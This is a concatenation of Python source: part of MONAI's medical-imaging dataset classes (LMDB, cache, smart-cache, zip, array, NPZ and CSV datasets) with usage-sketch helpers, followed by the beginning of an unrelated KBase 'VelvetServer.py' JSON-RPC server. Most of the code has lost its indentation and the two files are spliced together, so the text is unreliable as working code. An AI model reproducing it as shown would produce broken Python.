`LMDBDataset` expects the input data to be a list of serializable items
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(
data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func, pickle_protocol=pickle_protocol
)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write the cache if needed. py-lmdb doesn't have good support for concurrent writes.
This method can be used with multiple processes, but it may have a negative impact on performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
If the item is not found in the LMDB file, fall back to the default `PersistentDataset` caching behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
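# Illustrative usage sketch (not part of the original module, requires the optional
# `lmdb` package): cached results are stored in a single LMDB file under `cache_dir`,
# and `info()` exposes the underlying environment statistics.
def _example_lmdb_dataset(cache_dir="./lmdb_cache"):
    from monai.transforms import SimulateDelayd

    items = [{"data": i} for i in range(5)]
    ds = LMDBDataset(items, transform=SimulateDelayd("data", delay_time=0.01), cache_dir=cache_dir)
    return list(ds), ds.info()  # cached items plus LMDB environment info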
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
To improve caching efficiency, always put as many non-random transforms as possible
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and its outcome is not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. It may take a long time to prepare the cache content, depending on the size of the expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker threads to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cached content
(for example, randomly crop from the cached image and deepcopy the crop region)
or if every cache item is only used once in a `multi-processing` environment,
may set `copy_cache=False` for better performance.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
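# Illustrative usage sketch (not part of the original module): cache only half of the
# items in memory (`cache_rate=0.5`); uncached indices run the full transform chain.
# `files` is a hypothetical list of dicts such as [{"image": "img1.nii.gz"}, ...].
def _example_cache_dataset(files):
    from torch.utils.data import DataLoader
    from monai.transforms import Compose, LoadImaged, RandFlipd

    transforms = Compose([LoadImaged(keys=["image"]), RandFlipd(keys=["image"], prob=0.5)])
    ds = CacheDataset(data=files, transform=transforms, cache_rate=0.5, num_workers=2)
    return DataLoader(ds, batch_size=2, num_workers=0)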
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 4: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work in the cases below:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on Windows (where the default multiprocessing start method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy_cache=False` for better performance.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can use multiple threads to accelerate the computation.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
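# Illustrative usage sketch (not part of the original module): the four-step SmartCache
# workflow from the class docstring. `data` and `transforms` are hypothetical and the
# data list is assumed to be larger than `cache_num`.
def _example_smart_cache(data, transforms, num_epochs=3):
    ds = SmartCacheDataset(data=data, transform=transforms, replace_rate=0.25, cache_num=16)  # 1. cache first epoch
    ds.start()                      # 2. launch the background replacement thread
    for _ in range(num_epochs):
        for i in range(len(ds)):    # hypothetical training loop over the cached items
            _item = ds[i]
        ds.update_cache()           # 3. swap in the replacement items for the next epoch
    ds.shutdown()                   # 4. stop the background thread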
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data (with the same index) together in a tuple.
If the output of a single dataset is already a tuple, flatten it and extend it to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
If the datasets don't have the same length, the minimum length among them is used as the length
of the ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training is based on images and metadata, the array transforms cannot be composed
because several transforms receive multiple parameters or return multiple values. Then users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
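# Illustrative usage sketch (not part of the original module): `ArrayDataset` re-seeds
# the random transforms of every zipped component per item, so the random flip applied
# to an image is mirrored on its segmentation. The file lists are hypothetical.
def _example_array_dataset(image_files, seg_files):
    from monai.transforms import AddChannel, Compose, LoadImage, RandFlip

    img_xform = Compose([LoadImage(image_only=True), AddChannel(), RandFlip(prob=0.5)])
    seg_xform = Compose([LoadImage(image_only=True), AddChannel(), RandFlip(prob=0.5)])
    ds = ArrayDataset(img=image_files, img_transform=img_xform,
                      seg=seg_files, seg_transform=seg_xform)
    img, seg = ds[0]  # both transforms were seeded identically for this index
    return img, seg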
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
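# Illustrative usage sketch (not part of the original module): build a throwaway .npz
# file and expose its arrays as named dict items.
def _example_npz_dataset(npz_path="./example.npz"):
    np.savez(npz_path, images=np.zeros((10, 1, 8, 8)), labels=np.ones((10,)))
    ds = NPZDictItemDataset(npzfile=npz_path, keys={"images": "img", "labels": "label"})
    return len(ds), ds[0]  # -> (10, {"img": <1x8x8 array>, "label": 1.0})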
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
It supports loading only specific rows and columns,
and can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be an int or a range `[start, end)` of the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
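# Illustrative usage sketch (not part of the original module): `subjects.csv` is a
# hypothetical file with image, meta_0, meta_1 and meta_2 columns; `col_groups` packs
# the meta_* columns into a single "meta" entry as in the class docstring.
def _example_csv_dataset(filename="subjects.csv"):
    ds = CSVDataset(
        filename=filename,
        col_types={"meta_0": {"type": float, "default": 0.0}},
        col_groups={"meta": ["meta_0", "meta_1", "meta_2"]},
    )
    return ds[0]  # e.g. {"image": ..., "meta_0": ..., "meta_1": ..., "meta_2": ..., "meta": [...]}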
|
VelvetServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Velvet.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Velvet'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Velvet.VelvetImpl import Velvet # noqa @IgnorePep8
impl_Velvet = Velvet(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is the same as call() except that the return value is a Python
object instead of a JSON string. This method is mainly useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
